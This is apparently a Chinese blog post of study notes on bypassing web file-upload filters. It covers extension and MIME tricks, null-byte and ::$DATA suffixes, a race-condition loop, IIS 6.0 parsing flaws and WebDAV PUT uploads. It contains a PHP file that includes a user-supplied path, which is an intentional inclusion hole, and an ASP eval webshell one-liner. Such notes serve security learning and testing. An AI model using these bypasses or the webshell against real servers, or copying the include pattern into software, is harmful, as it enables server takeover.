zoukankan      html  css  js  c++  java
  • 文件上传

    绕过方法

    去除前端js认证

    修改mime-type类型

    添加空格绕过  php                    

    修改文件后缀名 php2、php3、phtml

    大小写混淆绕过 PhP

    点号绕过    php.

    特殊符号绕过  php::$DATA

    路径绕过    php. .

    双写绕过    pphphp

    %00绕过    php%00(php5.3以下版本且关闭GPC)

    文件包含先上传包含文件file.php

    <?php
       if($_GET){
                include($_GET["file"]);
        }
        else{
                echo "not het args file";
        }
    ?>

    再上传shell文件用文件包含访问含GIF98A的.jpg文件

    file.php?file=1.jpg

    竞争

    编写脚本一直访问网页

    import requests
    
    while True:
           requests.get("url")

    启动脚本,然后上传文件

    IIS6.0漏洞

    解析

    *.asa  *.asp目录里的文件都会被解析

    *.asp;test.jpg

    <%=NOW()%>

    PUT漏洞
    PUT启动
    开启webDAV,给予写入权限

    <%eval request("cmd")%>

    OPTIONS查看请求类型

    PUT上传文件

    COPY修改文件

    文件后缀
    .asa
    .cer
    .cdx

    后缀文件会被解析为asp文件

  • 相关阅读:
    关于产品
    Windows服务 + Quartz.NET
    C#
    C#
    URL
    前端生态系统总结
    字符串相似度
    Process Explore & Windbg
    webpack
    JS
  • 原文地址:https://www.cnblogs.com/f1veseven/p/13322084.html
Copyright © 2011-2022 走看看